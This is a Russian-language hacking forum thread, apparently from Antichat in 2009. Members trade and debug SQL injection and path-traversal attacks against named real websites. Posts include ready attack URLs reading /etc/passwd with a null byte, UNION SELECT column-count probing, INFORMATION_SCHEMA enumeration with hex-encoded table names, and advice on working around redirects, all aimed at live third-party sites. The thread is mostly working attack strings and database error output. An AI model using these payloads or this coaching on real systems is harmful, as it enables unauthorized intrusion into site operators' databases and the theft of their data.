Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

30.01.2009, 00:17
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
Наверно нужно быть зарегенным что-бы увидеть...
http://www.pitchsidemanager.com/new_player.php?ad=&step=../../../../../../../../etc/passwd%00
|
|
|

30.01.2009, 00:54
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Сообщение от x311
здраствуйте
отправили меня в этот топик
вот сдаюсь
помогите пожалуйста
http://www.pitchsidemanager.com/club.php?stid=-1294'
http://www.pitchsidemanager.com/profile.php?smid=-1'
http://www.pitchsidemanager.com/player_profile.php?pid=-3406'
Вот:
Код:
http://www.pitchsidemanager.com/club.php?stid=-1294'+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+
|
|
|

30.01.2009, 01:18
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
AkyHa_MaTaTa, union%0Aselect, но все равно привет подзапросам, см сам)
|
|
|

30.01.2009, 01:39
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Сообщение от TELO
а чем брутиш?
А это имеет значение ? Работает же.
|
|
|

30.01.2009, 03:16
|
|
Новичок
Регистрация: 23.01.2009
Сообщений: 4
Провел на форуме: 9769
Репутация:
-1
|
|
Сообщение от ElteRUS
Наверно нужно быть зарегенным что-бы увидеть...
http://www.pitchsidemanager.com/new_player.php?ad=&step=../../../../../../../../etc/passwd%00
улыбнуло
Спасибо всем ! значит просто я поля не так подбирал ...
вот еще одна незадача.
motion-twin.com/blog/month?m=10001'
1. Когда подставляю -10001' ошибка не выползает , но что бы выползла - не получается
2. Если выполнить такой запрос -1'/* ошибка показывается вот с такой фишкой , где меняется дата
SELECT BlogEntry.* FROM BlogEntry LEFT JOIN BlogCategory ON BlogEntry.categoryId=BlogCategory.id WHERE hidden=0 AND isVisible=1 AND cdate >= '-1'/-*-01' AND cdate <= '-1'/-*-31' ORDER BY cdate DESC You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '*-01' AND cdate <= '-1'/-*-31' ORDER BY cdate DESC' at line 1
3 . Если убрать минус то получится 1'/* то выдает date.c(104) : Invalid date format : 1-00-01
4 .Попбробовал -1-00-01'/* Календарь показал :
Zero -1
Lu Ma Me Je Ve Sa Di
1 2 3 4
5. (если -10 то ивалид date , если -100,-200 etc то на календаре меняется Zero -100, -200)
6 . Все что ниже 10000 = ошибка
7. А вот когда делаю запрос m=999999'+order+by+1/*
на календаре теперь
null 9999
Lu Ma Me Je Ve Sa Di
1 2 3 4
(на заметку : отображаются только числа 1,2.3.4 на каледнаре из 31)
8 . Пробовал 25-02-05' или 25-02-05 для примера показывает February 25
9. когда -25-02-05 выдает date.c(104) : Invalid date format : -25-02-01
10 . когда 1'+order+by+1/* выдает ошибку где вместо 0000 видно такое
BlogEntry.categoryId=BlogCategory.id WHERE hidden=0 AND isVisible=1 AND cdate >= ' 1' o-rd-01' AND cdate <= '1' o-rd-31' ORDER BY
=
|
|
|

30.01.2009, 03:16
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме: 227123
Репутация:
122
|
|
Сообщение от Велемир
А это имеет значение ? Работает же.
просто спросил....вот у меня нет брута..хотел узнать где взял.
Мужики, а как узнать количество столбцов,когда
Код:
http://photo.gala.net/index.php?action=view&id=120141026%20order%20by%2011%20--
показывает не полный вывод страницы..но вывод,а
Код:
http://photo.gala.net/index.php?action=view&id=120141026%20order%20by%205%20--
полный
так как order by 12 воще ничего не выводит
и в том и в том случае не видно названия столбцов
(-)пробовал
и ещё вопрос,если при вставлянии кавычки перебрасывает на главную, это скуль? Если да,тот остановить переброс?
Вот пример:
Код:
http://sinelnikovo.org.ua/viewpage.php?page_id=21'
а вот ещё вопросег,есть скуль:
Код:
http://www.bisound.com/index.php?name=Files&op=view_file&id=8533321%20order%20by%2032%20--
а при union select перебрасівает на главную
Последний раз редактировалось TELO; 30.01.2009 в 03:57..
|
|
|

30.01.2009, 08:05
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
TELO
http://photo.gala.net/index.php?action=view&id=-120141026+union+select+222--
1 колонка
http://www.bisound.com/index.php?name=Files&op=view_file&id=8533321+or+1= 1/*
скуля есть подбирай поля в ручную... перебрасывает изза того что запрос не верный )
http://sinelnikovo.org.ua/viewpage.php?page_id=21'
скули нет
x311
http://www.motion-twin.com/blog/day?d=20090109
хмм чтото не понятное) может просто ругается на неправильную дату?
Последний раз редактировалось sabe; 30.01.2009 в 08:21..
|
|
|

30.01.2009, 11:20
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Подобрал примерные таблицы (14 полей)
Пытаюсь вывести колонки из таблицы (пробелы из линка моего убрать!)
Код:
http://www.bzpower.com/story.php?ID=-1+union+select+1,2,3,4,5,6,COLUMN_NAME,9,9,10,11,12,13,11111+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='ibf_profile_portal'+limit+1,1--
Не выводиться =\
я слышал что надо как то перекодировать таблицу после табл нейм (ну точно не знаю)
вообщемс помогите что у меня не так в запросе 
|
|
|

30.01.2009, 11:24
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
Сообщение от diznt
Подобрал примерные таблицы (14 полей)
Пытаюсь вывести колонки из таблицы (пробелы из линка моего убрать!)
Код:
http://www.bzpower.com/story.php?ID=-1+union+select+1,2,3,4,5,6,COLUMN_NAME,9,9,10,11,12,13,11111+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='ibf_profile_portal'+limit+1,1--
Не выводиться =\
я слышал что надо как то перекодировать таблицу после табл нейм (ну точно не знаю)
вообщемс помогите что у меня не так в запросе 
название таблички в hex
0xHExназваниетаблицЫ
у тебя будет
Код:
http://www.bzpower.com/story.php?ID=-1+union+select+1,2,3,4,5,6,COLUMN_NAME,9,9,10,11,12,13,11111+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6962665f70726f66696c655f706f7274616c+limit+1,1--
|
|
|

30.01.2009, 12:05
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Есть сайт так вот при подборе полей ниче не выводиться а когда подставляю id=1' то ошибка есть(еррор синтаксис)!
Мб кто знает?
Пробывал и так подобрать id=1'+union+select+1,2-- (и т.д.) все равно ошибка Mysql (причем в синтаксисе и перебрал я так до 20 полей) а если убрать ' то ниче не выводиться как я говорил
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|